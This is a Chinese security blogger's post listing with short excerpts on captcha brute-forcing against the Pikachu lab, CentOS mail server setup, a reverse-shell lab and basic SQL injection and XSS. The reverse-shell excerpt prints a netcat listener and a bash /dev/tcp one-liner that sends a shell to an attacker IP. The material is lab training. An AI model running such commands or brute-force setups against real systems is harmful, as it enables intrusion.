自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(5)
  • 收藏
  • 关注

原创 对有验证码的后台网页进行爆破-captcha-killer-modified

接着配置接口URL,填写为http://127.0.0.1:8888,在Reques template 中右击配置模板库为ddddocr(没有使用过工具的,这里在未设置模板库时应该是 无内容的)攻击目标url:http://xxxx/pikachu-master/vul/burteforce/bf_server.php(xxxx为自己的靶机地址,我的就是127.0.0.1)攻击目标的验证码图片接口的url:http://127.0.0.1/pikachu-master/inc/showvcode.php。

2023-03-22 17:46:47 2853 3

原创 安装captcha-killer-modified插件(windos+python环境)

我这里运行报错,通过报错信息查了一下需要安装opencv-python-headless

2023-03-22 17:35:34 1514 4

原创 centos7之邮件服务器搭建

Dns服务配置安装服务 yum -y install bind*启动服务 systemctl start named可以通过以下操作查看服务启动状况更改配置文件 /etc/named.conf向配置文件中添加/etc/named.rfc1912.zones配置正向反向文件可以通过复制模板文件实现正向 cp -p /var/named/named.localhost /var/named/hs.com.zone反向 cp -p /var/named/named.loopback

2021-01-06 19:01:26 1516

原创 2020-08-12

反弹shell实验攻击机kali2019:192.168.216.141靶机kali2020:192.168.216.152攻击机kali2019监听6767端口nc -lvp 6767 -l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。 **bash -i >& /dev/tcp/192.168.216.141/6767 0>&1**

2020-08-12 19:34:17 140

原创 web小白入门基础漏洞认识一

web小白入门基础漏洞认识一(SQL注入,XSS注入)SQL注入XSS攻击文件上传文件包含SQL注入SQL注入漏洞概述:对于客户端提交的数据,程序员在编写web程序时未对提交的参数进行严格的过滤或转义直接带入数据库就造成了用户可以构造参数,提交SQL查询语句,从而获得敏感信息或执行危险代码,这就是SQL注入攻击原理。SQL注入流程判断是否存在SQL注入漏洞(观察标志性特征如:id=1,并通过id传递一个值查看是否有回显)判断闭合(分为数字型和字符型两种)字符型常见闭合符号:’ “ ‘)

2020-07-22 22:42:39 422

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除